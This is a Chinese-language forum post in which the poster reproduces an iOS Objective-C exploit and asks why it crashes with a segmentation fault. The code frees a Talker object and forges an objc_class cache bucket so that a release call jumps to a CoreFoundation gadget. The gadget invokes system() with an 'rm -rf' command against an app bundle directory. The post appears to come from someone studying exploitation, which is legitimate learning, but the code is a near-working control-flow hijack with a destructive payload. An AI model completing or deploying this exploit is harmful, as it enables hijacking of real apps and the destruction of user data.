继续复现,发现在编译好安装到iOS上执行之后出现Segement Fault 11
经过调试之后确认是在talker对象执行那个被替换后的release函数之后发生的
int main(void) {
Talker *talker = [[Talker alloc] init];
[talker say: @"Hello, Ice and Fire!"];
[talker say: @"Hello, Ice and Fire!"];
[talker release];
fake_cache_bucket.cached_sel = (void*) NSSelectorFromString(@"release");
NSLog(@"cached_sel = %p", NSSelectorFromString(@"release"));
uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
NSLog(@"CoreFoundationbase address = %p", (void*)CoreFoundation_base);
//0x00000000000dcf7c ldr x1, [x0, #0x98] ; ldr x0, [x0, #0x70] ; cbz x1, #0xdcf9c ; br x1
fake_cache_bucket.cached_function = (void*)CoreFoundation_base + 0x00000000000dcf7c;
NSLog(@"fake_cache_bucket.cached_function = %p", (void*)fake_cache_bucket.cached_function);
fake_receiver.x0=(uint64_t)&fake_receiver.cmd;
fake_receiver.x1=(void *)dlsym(RTLD_DEFAULT, "system");
NSLog(@"system_address = %p", (void*)fake_receiver.x1);
strcpy(fake_receiver.cmd, "rm -rf /var/mobile/Containers/Bundle/Application/ED6F728B-CC15-466B-942B-FBC4C534FF95/");
fake_objc_class.cache_buckets_ptr = &fake_cache_bucket;
fake_objc_class.cache_bucket_mask=0;
fake_receiver.fake_objc_class_ptr=&fake_objc_class;
talker= &fake_receiver;
[talker release];
}
后来编译了armv7架构的也是同样的问题,在日志中找到程序crash掉之后的信息:
得到了pc指针的值,请问一下接下来排错的思路是什么,我在网上查的溢出报段错误的是在编译的时候关闭了ASLR之类的(感觉跟这个无关),但是对于iOS的系统来说还没有找到类似的回答
照理来说r0应该存放着对象的指针值,但是却没有,感觉有点奇怪?